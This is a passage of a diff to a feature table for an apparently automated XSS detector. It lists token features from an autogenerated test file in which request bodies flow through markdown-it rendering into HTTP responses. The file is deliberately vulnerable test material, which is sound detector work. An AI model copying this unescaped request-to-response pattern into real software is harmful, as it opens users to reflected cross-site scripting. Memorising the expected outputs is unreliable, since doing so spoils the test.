InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:39 | markdow ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -20163,6 +134768,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:39 | markdow ... q.body) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:39 | markdow ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:39 | markdow ... q.body) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:24:99:29 | render | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:24:99:29 | render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:24:99:29 | render | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:24:99:29 | render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:24:99:29 | render | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:31:99:33 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:31:99:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:31:99:33 | req | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:31:99:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:31:99:33 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:31:99:38 | req.body | CalleeFlexibleAccessPath | markdownIt2.render | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:31:99:38 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:31:99:38 | req.body | calleeImports | markdown-it | @@ -20172,6 +134787,51 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:31:99:38 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:31:99:38 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:31:99:38 | req.body | receiverName | markdownIt2 | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:35:99:38 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:35:99:38 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:35:99:38 | body | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:35:99:38 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:35:99:38 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:5 | res | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:10 | res.send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:40 | exceptional return of res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:40 | exceptional return of res.sen ... .body)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:40 | exceptional return of res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:40 | exceptional return of res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:40 | exceptional return of res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:40 | res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:40 | res.sen ... .body)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:40 | res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:40 | res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:3:100:40 | res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:7:100:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:7:100:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:7:100:10 | send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:7:100:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:7:100:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:22 | markdownIt3 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:22 | markdownIt3 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:22 | markdownIt3 | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:22 | markdownIt3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:22 | markdownIt3 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:29 | markdownIt3.render | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:29 | markdownIt3.render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:29 | markdownIt3.render | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:29 | markdownIt3.render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:29 | markdownIt3.render | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:39 | exceptional return of markdow ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:39 | exceptional return of markdow ... q.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:39 | exceptional return of markdow ... q.body) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:39 | exceptional return of markdow ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:39 | exceptional return of markdow ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:39 | markdow ... q.body) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:39 | markdow ... q.body) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:39 | markdow ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -20180,6 +134840,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:39 | markdow ... q.body) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:39 | markdow ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:12:100:39 | markdow ... q.body) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:24:100:29 | render | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:24:100:29 | render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:24:100:29 | render | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:24:100:29 | render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:24:100:29 | render | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:31:100:33 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:31:100:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:31:100:33 | req | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:31:100:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:31:100:33 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:31:100:38 | req.body | CalleeFlexibleAccessPath | markdownIt3.render | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:31:100:38 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:31:100:38 | req.body | calleeImports | markdown-it | @@ -20189,6 +134859,66 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:31:100:38 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:31:100:38 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:31:100:38 | req.body | receiverName | markdownIt3 | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:35:100:38 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:35:100:38 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:35:100:38 | body | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:35:100:38 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:100:35:100:38 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:5 | res | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:10 | res.send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:77 | exceptional return of res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:77 | exceptional return of res.sen ... .body)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:77 | exceptional return of res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:77 | exceptional return of res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:77 | exceptional return of res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:77 | res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:77 | res.sen ... .body)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:77 | res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:77 | res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:3:102:77 | res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:7:102:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:7:102:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:7:102:10 | send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:7:102:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:7:102:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:21 | markdownIt | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:21 | markdownIt | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:21 | markdownIt | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:21 | markdownIt | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:21 | markdownIt | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:25 | markdownIt.use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:25 | markdownIt.use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:25 | markdownIt.use | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:25 | markdownIt.use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:25 | markdownIt.use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:59 | exceptional return of markdow ... izer')) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:59 | exceptional return of markdow ... izer')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:59 | exceptional return of markdow ... izer')) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:59 | exceptional return of markdow ... izer')) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:59 | exceptional return of markdow ... izer')) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:59 | markdow ... izer')) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:59 | markdow ... izer')) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:59 | markdow ... izer')) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:59 | markdow ... izer')) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:59 | markdow ... izer')) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:66 | markdow ... .render | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:66 | markdow ... .render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:66 | markdow ... .render | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:66 | markdow ... .render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:66 | markdow ... .render | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:76 | exceptional return of markdow ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:76 | exceptional return of markdow ... q.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:76 | exceptional return of markdow ... q.body) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:76 | exceptional return of markdow ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:76 | exceptional return of markdow ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:76 | markdow ... q.body) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:76 | markdow ... q.body) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:76 | markdow ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -20197,6 +134927,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:76 | markdow ... q.body) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:76 | markdow ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:12:102:76 | markdow ... q.body) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:102:23:102:25 | use | 